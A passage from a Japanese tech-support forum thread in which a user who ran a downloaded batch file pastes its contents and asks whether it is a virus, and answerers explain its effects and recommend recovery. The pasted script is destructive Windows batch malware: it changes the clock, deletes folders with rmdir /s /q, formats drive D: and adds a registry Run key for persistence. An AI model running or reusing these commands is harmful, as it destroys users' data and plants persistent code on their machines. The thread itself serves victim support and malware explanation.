- 締切済み
これはウイルスでしょうか?
DLしたbatファイルを実行したらウイルスに感染しました。 等のフルダが大量に作られ、PC内の時計がいじられました。 avastを入れてるのですが、何の反応もなかった為躊躇いもなくクリックしてしまいました。 時計がいじられてしまったので、反応がなかったとはいえ心配です。 batをtxt化しましたので、どなたか分かる方いましたら今後どうすればいいかよろしくお願いします。 date 2001-01-02 time 22:20:10 rmdir "C:\Program Files\CAPCOM" /s /q rmdir "C:\Program Files\NtreevSoft" /s /q rmdir "My Documents\My Downloads" /s /q rmdir "My Documents\受信したファイル" /s /q rmdir "Favorites" /s /q cd デスクトップ move "モンスターハンター フロンティア オンライン.lnk" "お前はモンスター 俺がハンター 風呂んティア.lnk" mkdir ウイルスに感染しました ウイルスに感染しますた ウイルスにのっとられました 今すぐウイルス対策ソフトを実行汁 個人情報丸出し乙 1時間後に再起動しますw メール見ちゃらめぇ お前のメッセ登録数すくないのうww少ない脳www 馬鹿がまた1人釣れました もう二度と人間を信じない方がいい・・・! 人間・・・食う 貴方の御家に後で電話掛けますわ format d:\ /v:ウイルス増殖用ドライブ /q copy "up3722\RE8.5_install.bat" "C:\WINDOWS\system32\re.bat" reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v re8 /f /d C:\WINDOWS\system32\re.bat
- gaianto
- お礼率20% (47/232)
- ウィルス・マルウェア
- 回答数4
- ありがとう数4
- みんなの回答 (4)
- 専門家の回答
みんなの回答
- waros99
- ベストアンサー率29% (162/544)
こんにちは。 普通、どこから落としてこようとVirusTotalとかかけますよ。 最近はロダにもウイルスありますね。 batなら普通に中身見れるから確認すればよかったのに。 リカバリですな。ちなみに、ボクは今日システムのイメージバックアップ取ったとこです。 ※お勧め 「Folder LockBox」 「Acronis True Image」
- yoshi-thk
- ベストアンサー率38% (2059/5283)
>P2Pを利用していなくても個人情報の漏洩というのは起きるんでしょうか? 「山田オルタナティブ」ってウイルス知ってますか? その未知の亜種に掛かっていると、ウイルス対策ソフトでも分からないです。 一応そのウイルスについての記事を紹介するので確認してください。 INTERNET Watch HDDの全内容を公開する「山田オルタナティブ」、Winny利用者以外も注意 http://internet.watch.impress.co.jp/cda/news/2006/03/03/11106.html
- yoshi-thk
- ベストアンサー率38% (2059/5283)
No1方の今回のリカバリは、ハードディスクをクリーンフォーマットして、OS等を入れ直すという事です。 僕もNo1の方の意見に賛同します。 ハードディスクのフォーマットは、それ用のソフトがなくても出来ますし、 今回の場合は、他のウイルスが入っている可能性があるのでクリーンフォーマットを勧めるのです。 システムの復元で、完全に駆除出来る可能性はないです。 何でもタダで済まそうとしたのですから、相応の苦労をした方がよいでしょう。 それから、そのようなウイルスに感染したとすれば、どのような場所から入手したか分かります。 場合によっては、P2Pソフト上にあなたの情報が漏れている可能性もあります。 今後は怪しいものは、ダウンロードするべきではないです。
お礼
ありがとうございます。 ファイルはアップローダーからDLしたもので、P2Pから落とした物では無いです。 avastを入れているのですが警告もなかったため安易に実行してしまいました。 P2Pを利用していなくても個人情報の漏洩というのは起きるんでしょうか? avast、ウイルスバスターでオンラインスキャンをしたのですがウイルスは発見されませんでした。 クリーンフォーマットは色々事情があって恐らくできないと思います。 とりあえずre.batをレジストリから削除してみましたが・・・
- Cupper
- ベストアンサー率32% (2123/6444)
たいしたことはされていませんが、いくつかのフォルダを削除されていますね。(rmdir) Dドライブもフォーマット(初期化)されています。(format) さらに起動時に不明なプログラムをインストールするように仕掛けられているようです。(reg add) ・・・質問者が個人で復旧を試みるのでしたら、リカバリしたほうがスッキリ&確実ですよ。 マイドキュメントに保存しているデータも削除されているようですので、この際 購入時の状態にまで戻してみるのも一興です。 まあ、いい経験をしたと考えるようにしましょう。
お礼
ありがとうございます。 Dが初期化、マイドキュメントが削除されてるらしいですが、 Dをサッと見る限り、何も消されたようには見えないのですが・・・ マイドキュメンドも、質問内容のtxtに「受信したファイル」があったので見てみたのですが、 消されていないようです。Downloadsは空になっていますが、元から空だったような・・・ リカバリというのは、リカバリディスクを使っての事でしょうか? システムの復元ではどうにかなりませんか?
補足
書き込んでから思ったのですが、もしかして再起動してからformatやrmdirが実行されるんでしょうか? だとするとまだ再起動してないので・・・ できれば個人でなるべくお金をかけずにbatを実行する前の状態まで戻したいのですが 市販のリカバリを使うしかないんですかね・・・
![その他([技術者向] コンピューター) イメージ](https://gazo.okwave.jp/okwave/spn/images/related_qa/c205_1_thumbnail_img_sm.png)
お礼
ありがとうございます。 見てきましたが、感染済だと気付きようもないみたいですしどうしようもなさそうですね・・・